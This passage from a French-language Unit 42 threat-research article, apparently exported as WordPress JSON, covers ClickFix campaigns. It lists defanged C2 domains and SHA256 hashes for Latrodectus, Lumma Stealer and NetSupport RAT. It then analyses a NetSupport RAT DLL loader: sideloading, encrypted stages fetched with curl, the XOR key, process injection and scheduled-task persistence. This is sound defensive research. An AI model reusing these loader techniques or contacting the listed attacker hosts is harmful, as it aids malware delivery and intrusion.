courier, monospace;\">stuffgull[.]top<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">sumeriavgv[.]digital<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">pub-626890a630d8418ea6c2ef0fa17f02ef.r2[.]dev<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">pub-164d8d82c41c4e1b871bc21802a18154.r2[.]dev<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">pub-a5a2932dc7f143499b865f8580102688.r2[.]dev<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">pub-7efc089d5da740a994d1472af48fc689.r2[.]dev<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">agroeconb[.]live<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">animatcxju[.]live<\/span><\/li>\n<\/ul>\n<p>Hachages SHA256 de l\u2019\u00e9chantillon de Latrodectus<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Nom de fichier libcef.dll\u00a0: 5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">T\u00e9l\u00e9chargeur PowerShell\u00a0: 52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">T\u00e9l\u00e9chargeur JavaScript\u00a0: 57e75c98b22d1453da5b2642c8daf6c363c60552e77a52ad154c200187d20b9a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">T\u00e9l\u00e9chargeur JavaScript\u00a0: 33a0cf0a0105d8b65cf62f31ec0a6dcd48e781d1fece35b963c6267ab2875559<\/span><\/li>\n<\/ul>\n<p>URL C2 de l\u2019\u00e9chantillon de Latrodectus<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/webbs[.]live\/on\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/diab[.]live\/up\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/mhbr[.]live\/do\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/decr[.]live\/j\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/lexip[.]live\/n\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/rimz[.]live\/u\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/byjs[.]live\/v\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/btco[.]live\/r\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/izan[.]live\/r\/<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/k.veuwb[.]live\/234<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/r.netluc[.]live<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">heyues[.]live<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">hxxps[:]\/\/k.mailam[.]live\/234234<\/span><\/li>\n<\/ul>\n<p>Hachages SHA256 de l\u2019\u00e9chantillon de NetSupport RAT<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Nom de fichier data_3.bin (stager chiffr\u00e9 avec XOR)\u00a0: 5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Nom de fichier data_4.bin (code shell chiffr\u00e9 avec XOR)\u00a0: 9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Nom de fichier msvcp140.dll (chargeur)\u00a0: CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">NetSupport Loader Mutex\u00a0:<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">nx0kFgSPY8SDVhOMjmNgW<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/www.virustotal.com\/gui\/search\/name%253A%2522libsqlite3-0.dll%2522\">libsqlite3-0.dll<\/a>\u00a0: 506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Emplacement du fichier C:\\ProgramData\\SecurityCheck_v1\\client32.exe\u00a0: 3ACC40334EF86FD0422FB386CA4FB8836C4FA0E722A5FCFA0086B9182127C1D7<\/span><\/li>\n<\/ul>\n<p>Domaines pour le chargeur provenant de l\u2019\u00e9chantillon de NetSupport RAT\u00a0:<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">oktacheck.it[.]com<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">doccsign.it[.]com<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">docusign.sa[.]com<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">dosign.<a href=\"https:\/\/www.virustotal.com\/gui\/url\/011256aebe5b234ba3c7169067871236fcfc772a5de1d9a7f683205089566c3d\">it<\/a>[.]com<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">loyalcompany[.]net<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">leocompany[.]org<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">80.77.23[.]48<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">mhousecreative[.]com<\/span><\/li>\n<\/ul>\n<p>Domaines C2 de l\u2019\u00e9chantillon de NetSupport RAT\u00a0:<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">mh-sns[.]com<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">lasix20[.]com<\/span><\/li>\n<\/ul>\n<h2><a id=\"post-152402-_heading=h.e6bq56yh1iu3\"><\/a>Pour aller plus loin<\/h2>\n<ul>\n<li><a href=\"https:\/\/unit42.paloaltonetworks.com\/lampion-malware-clickfix-lures\/\" target=\"_blank\" rel=\"noopener\">Lampion Is Back With ClickFix Lures<\/a> \u2013 Unit 42, Palo Alto Networks<\/li>\n<li><a href=\"https:\/\/x.com\/Unit42_Intel\/status\/1924866530195427372\" target=\"_blank\" rel=\"noopener\">New ClickFix activity<\/a> \u2013 Unit 42, Palo Alto Networks<\/li>\n<li><a href=\"https:\/\/www.cybereason.com\/blog\/threat-analysis-lummastealer-2.0\" target=\"_blank\" rel=\"noopener\">From Shadow to Spotlight: The Evolution of Lumma Stealer and Its Hidden Secrets<\/a> \u2013 CyberReason<\/li>\n<li><a href=\"https:\/\/www.esentire.com\/security-advisories\/netsupport-rat-clickfix-distribution\" target=\"_blank\" rel=\"noopener\">NetSupport RAT Clickfix Distribution<\/a> \u2013 Esentire<\/li>\n<li><a href=\"https:\/\/esentire.com\/security-advisories\/lumma-stealer-clickfix-distribution\" target=\"_blank\" rel=\"noopener\">Lumma Stealer ClickFix Distribution<\/a> \u2013 Esentire<\/li>\n<li><a href=\"https:\/\/www.cloudsek.com\/blog\/deepseek-clickfix-scam-exposed-protect-your-data-before-its-too-late?\" target=\"_blank\" rel=\"noopener\">DeepSeek ClickFix Scam Exposed!<\/a> \u2013 CloudSEK<\/li>\n<li><a href=\"https:\/\/blog.sekoia.io\/clearfake-a-newcomer-to-the-fake-updates-threats-landscape\/\" target=\"_blank\" rel=\"noopener\">ClearFake: a newcomer to the \u201cfake updates\u201d threats landscape<\/a> \u2013 Sekoia<\/li>\n<li><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2\" target=\"_blank\" rel=\"noopener\">Havoc: SharePoint with Microsoft Graph API turns into FUD C2<\/a> \u2013 Fortinet<\/li>\n<\/ul>\n<h2><a id=\"post-152402-_heading=h.4pfb07h9b40i\"><\/a>Annexe\u00a0: Analyse technique du nouveau chargeur de NetSupport RAT<\/h2>\n<p>Cette section s\u2019int\u00e9resse de pr\u00e8s au nouveau chargeur NetSupport RAT bas\u00e9 sur un fichier DLL, qui repr\u00e9sente un plus grand d\u00e9fi pour les analystes que les campagnes pr\u00e9c\u00e9dentes. Dans le pass\u00e9, NetSupport RAT \u00e9tait charg\u00e9 par des <a href=\"https:\/\/securelist.com\/horns-n-hooves-campaign-delivering-netsupport-rat\/114740\/\" target=\"_blank\" rel=\"noopener\">chargeurs de scripts<\/a> avec des cha\u00eenes d\u2019infection relativement courtes, tandis que ce nouveau chargeur ajoute un niveau suppl\u00e9mentaire de discr\u00e9tion et de complexit\u00e9 \u00e0 l\u2019attaque.<\/p>\n<p>L\u2019exemple que nous analysons ici est <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/www.virustotal.com\/gui\/file\/cbaf513e7fd4322b14adcc34b34d793d79076ad310925981548e8d3cff886527\" target=\"_blank\" rel=\"noopener\">msvcp140.dll<\/a>.<\/span> Ce fichier DLL est transf\u00e9r\u00e9 par un fichier ex\u00e9cutable l\u00e9gitime nomm\u00e9 <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/www.virustotal.com\/gui\/file\/1fc684c5adf02b5a96cc407932429f1c2d3d2e78e3104cfbcf535a9de1ee4921\" target=\"_blank\" rel=\"noopener\">jp2launcher.exe<\/a>.<\/span><\/p>\n<p>Ce fichier DLL utilise plusieurs techniques pour compliquer l\u2019analyse, notamment\u00a0:<\/p>\n<ul>\n<li>R\u00e9solution dynamique des API<\/li>\n<li>Chiffrement des donn\u00e9es<\/li>\n<li>Obfuscation du code<\/li>\n<\/ul>\n<p>\u00c0 titre d\u2019exemple, une fois transf\u00e9r\u00e9 en douce par <span style=\"font-family: 'courier new', courier, monospace;\">jp2launcher.exe<\/span>, le fichier DLL \u00e9crit le code de ses \u00e9tapes suivantes, octet par octet, directement dans la pile, Ensuite, il d\u00e9sobscurcit et ex\u00e9cute le code.<\/p>\n<p>Apr\u00e8s le d\u00e9sobscurcissement initial, le fichier DLL r\u00e9cup\u00e8re les fichiers binaires chiffr\u00e9s nomm\u00e9s <span style=\"font-family: 'courier new', courier, monospace;\">data_3.bin<\/span> et <span style=\"font-family: 'courier new', courier, monospace;\">data_4.bin<\/span> sur le serveur C2 via curl.exe et d\u00e9pose les payloads sur le disque dans le m\u00eame r\u00e9pertoire de travail. La figure\u00a013 illustre la construction de la commande<span style=\"font-family: 'courier new', courier, monospace;\"> curl.exe<\/span> pour t\u00e9l\u00e9charger l\u2019un des payloads.<\/p>\n<figure id=\"attachment_152535\" aria-describedby=\"caption-attachment-152535\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152535 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-103541-152402-13.png\" alt=\"Capture d\u2019\u00e9cran de HTML avec mise en \u00e9vidence de la syntaxe montrant diverses commandes telles que mov et push.\" width=\"1000\" height=\"97\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-103541-152402-13.png 1946w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-103541-152402-13-786x76.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-103541-152402-13-1920x185.png 1920w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-103541-152402-13-768x74.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-103541-152402-13-1536x148.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-152535\" class=\"wp-caption-text\">Figure 13. Le chargeur malveillant <span style=\"font-family: 'courier new', courier, monospace;\">msvcp140.dll<\/span> construit des commandes curl pour t\u00e9l\u00e9charger des fichiers .bin affich\u00e9s dans le <span style=\"font-family: 'courier new', courier, monospace;\">d\u00e9bogueur x64dbg<\/span>.<\/figcaption><\/figure>\n<p>Le chargeur enregistre les fichiers <span style=\"font-family: 'courier new', courier, monospace;\">data_3.bin<\/span> et <span style=\"font-family: 'courier new', courier, monospace;\">data_4.bin<\/span> sur le disque en tant que fichiers binaires chiffr\u00e9s, puis les d\u00e9chiffre en m\u00e9moire \u00e0 l\u2019aide d\u2019une cl\u00e9 XOR d\u00e9ploy\u00e9e, qui est <span style=\"font-family: 'courier new', courier, monospace;\">https:\/\/google[.]com\/<\/span>. Le chargeur injecte ensuite le code d\u00e9chiffr\u00e9 dans un processus enfant de<span style=\"font-family: 'courier new', courier, monospace;\"> jp2launcher.exe.<\/span><\/p>\n<p>Le code d\u00e9chiffr\u00e9 de <span style=\"font-family: 'courier new', courier, monospace;\">data_4.bin<\/span> est un code shell relativement petit qui charge le code d\u00e9chiffr\u00e9 de <span style=\"font-family: 'courier new', courier, monospace;\">data_3.bin<\/span>. Ce fichier binaire est un fichier ex\u00e9cutable PE complet qui t\u00e9l\u00e9charge le paquet final de NetSupport RAT sous forme d\u2019archive ZIP \u00e0 partir du serveur C2 de l\u2019attaquant et le d\u00e9compresse en m\u00e9moire. La figure\u00a014 montre la requ\u00eate du chargeur \u00e0 <span style=\"font-family: 'courier new', courier, monospace;\">hxxp[:]\/\/80.77.23[.]48\/service\/settings\/5702b2a25802ff1b520c0d1e388026f8074e836d4e69c10f9481283f886fd9f4<\/span>. La demande contient un agent utilisateur unique.<\/p>\n<figure id=\"attachment_152546\" aria-describedby=\"caption-attachment-152546\" style=\"width: 1007px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152546 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-107525-152402-14.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un journal d\u2019ordinateur d\u00e9taillant les requ\u00eates du serveur HTTP avec les horodatages et les r\u00e9ponses du serveur.\" width=\"1007\" height=\"157\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-107525-152402-14.png 1007w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-107525-152402-14-786x123.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-107525-152402-14-768x120.png 768w\" sizes=\"(max-width: 1007px) 100vw, 1007px\" \/><figcaption id=\"caption-attachment-152546\" class=\"wp-caption-text\">Figure 14. Demande de t\u00e9l\u00e9chargement de <span style=\"font-family: 'courier new', courier, monospace;\">jp2launcher.exe<\/span> depuis le serveur C2, t\u00e9l\u00e9chargeant <span style=\"font-family: 'courier new', courier, monospace;\">client32.exe<\/span>.<\/figcaption><\/figure>\n<p>Le payload final est une archive ZIP qui contient NetSupport RAT et toutes les d\u00e9pendances requises. Le chargeur d\u00e9pose NetSupport RAT dans <span style=\"font-family: 'courier new', courier, monospace;\">C:\\ProgramData\\SecurityCheck_v1\\<\/span> et ex\u00e9cute son fichier binaire principal<span style=\"font-family: 'courier new', courier, monospace;\">, client32.exe<\/span>.<\/p>\n<p>Le chargeur met ensuite en place la persistance de RAT en cr\u00e9ant une t\u00e2che planifi\u00e9e qui ex\u00e9cute <span style=\"font-family: 'courier new', courier, monospace;\">client32.exe<\/span> chaque fois qu\u2019un utilisateur se connecte.<\/p>\n<p>Lors de l\u2019analyse statique du chargeur, nous avons remarqu\u00e9 un chemin PDB unique, indiquant que ce fichier DLL fait partie d\u2019une certaine s\u00e9rie d\u2019outils MsiShell. En explorant cette piste, nous avons d\u00e9couvert un autre exemple de la campagne. Dans ce cas, les attaquants ont utilis\u00e9 un logiciel de transfert de fichiers l\u00e9gitime, <span style=\"font-family: 'courier new', courier, monospace;\">filezilla.exe<\/span>, et ont proc\u00e9d\u00e9 \u00e0 un transfert (sideloading) d\u2019une autre version du chargeur, nomm\u00e9e <span style=\"font-family: 'courier new', courier, monospace;\">libsqlite3-0.dll<\/span>. La figure\u00a015 illustre la similitude entre les chemins PDB des deux versions du chargeur.<\/p>\n<figure id=\"attachment_152557\" aria-describedby=\"caption-attachment-152557\" style=\"width: 800px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152557 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-111017-152402-15.png\" alt=\"Deux captures d\u2019\u00e9cran montrant des chemins d\u2019acc\u00e8s aux fichiers et des GUID pour des projets logiciels, tous deux \u00e9tant des artefacts de d\u00e9bogage. Chaque \u00e9l\u00e9ment est surlign\u00e9 en rouge.\" width=\"800\" height=\"215\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-111017-152402-15.png 1030w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-111017-152402-15-786x211.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/word-image-111017-152402-15-768x207.png 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><figcaption id=\"caption-attachment-152557\" class=\"wp-caption-text\">Figure 15. Chemins PDB des deux versions du chargeur NetSupport RAT.<\/figcaption><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Les campagnes ClickFix se multiplient. Trois d\u2019entre elles ont distribu\u00e9 les malwares NetSupport RAT, Latrodectus et Lumma Stealer.<\/p>\n","protected":false},"author":366,"featured_media":145730,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[8787,8832],"tags":[9471,9437,9439,9472,9233,9187,9473],"product_categories":[8956,8973,8979,8955,9041,9053,9064,9151],"coauthors":[9304,8870],"class_list":["post-152402","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-fr","category-threat-research-fr","tag-autoit-fr","tag-clickfix-fr","tag-lumma-stealer-fr","tag-malvertising-fr","tag-remote-access-trojan-fr","tag-social-engineering-fr","tag-typosquatting-fr","product_categories-advanced-dns-security-fr","product_categories-advanced-url-filtering-fr","product_categories-advanced-wildfire-fr","product_categories-cloud-delivered-security-services-fr","product_categories-cortex-fr","product_categories-cortex-xdr-fr","product_categories-cortex-xsiam-fr","product_categories-unit-42-incident-response-fr"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Fixez le clic\u00a0: pr\u00e9vention du vecteur d\u2019attaque ClickFix<\/title>\n<meta name=\"description\" content=\"Les campagnes ClickFix se multiplient. Trois d\u2019entre elles ont distribu\u00e9 les malwares NetSupport RAT, Latrodectus et Lumma Stealer.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Fixez le clic\u00a0: pr\u00e9vention du vecteur d\u2019attaque ClickFix\" \/>\n<meta property=\"og:description\" content=\"Les campagnes ClickFix se multiplient. Trois d\u2019entre elles ont distribu\u00e9 les malwares NetSupport RAT, Latrodectus et Lumma Stealer.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-10T14:19:54+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-08-20T15:28:44+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/11_Cybercrime_Category_1920x900.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Rem Dudas, Noa Dekel\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Fixez le clic\u00a0: pr\u00e9vention du vecteur d\u2019attaque ClickFix","description":"Les campagnes ClickFix se multiplient. Trois d\u2019entre elles ont distribu\u00e9 les malwares NetSupport RAT, Latrodectus et Lumma Stealer.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/","og_locale":"fr_FR","og_type":"article","og_title":"Fixez le clic\u00a0: pr\u00e9vention du vecteur d\u2019attaque ClickFix","og_description":"Les campagnes ClickFix se multiplient. Trois d\u2019entre elles ont distribu\u00e9 les malwares NetSupport RAT, Latrodectus et Lumma Stealer.","og_url":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/","og_site_name":"Unit 42","article_published_time":"2025-07-10T14:19:54+00:00","article_modified_time":"2025-08-20T15:28:44+00:00","og_image":[{"width":1920,"height":900,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/11_Cybercrime_Category_1920x900.jpg","type":"image\/jpeg"}],"author":"Rem Dudas, Noa Dekel","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/"},"author":{"name":"Sheida Azimi","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7ee97ec6f224446d57c0383eb5fd3639"},"headline":"Fixez le clic\u00a0: pr\u00e9vention du vecteur d\u2019attaque ClickFix","datePublished":"2025-07-10T14:19:54+00:00","dateModified":"2025-08-20T15:28:44+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/"},"wordCount":5140,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/11_Cybercrime_Category_1920x900.jpg","keywords":["AutoIT","ClickFix","Lumma Stealer","malvertising","Remote Access Trojan","social engineering","typosquatting"],"articleSection":["Malware","Recherche sur les menaces"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/","url":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/","name":"Fixez le clic\u00a0: pr\u00e9vention du vecteur d\u2019attaque ClickFix","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/11_Cybercrime_Category_1920x900.jpg","datePublished":"2025-07-10T14:19:54+00:00","dateModified":"2025-08-20T15:28:44+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7ee97ec6f224446d57c0383eb5fd3639"},"description":"Les campagnes ClickFix se multiplient. Trois d\u2019entre elles ont distribu\u00e9 les malwares NetSupport RAT, Latrodectus et Lumma Stealer.","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/11_Cybercrime_Category_1920x900.jpg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/11_Cybercrime_Category_1920x900.jpg","width":1920,"height":900,"caption":"Pictorial representation of a ClickFix campaign. A glowing, red padlock illuminated with light particles, set against a dark, rainy backdrop."},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/preventing-clickfix-attack-vector\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/"},{"@type":"ListItem","position":2,"name":"Fixez le clic\u00a0: pr\u00e9vention du vecteur d\u2019attaque ClickFix"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7ee97ec6f224446d57c0383eb5fd3639","name":"Sheida Azimi","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/9213e49ea48b7676660bac40d05c9e3e","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Sheida Azimi"},"url":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/author\/sheida-azimi\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts\/152402","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/users\/366"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/comments?post=152402"}],"version-history":[{"count":4,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts\/152402\/revisions"}],"predecessor-version":[{"id":152571,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts\/152402\/revisions\/152571"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/media\/145730"}],"wp:attachment":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/media?parent=152402"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/categories?post=152402"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/tags?post=152402"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/product_categories?post=152402"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/coauthors?post=152402"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}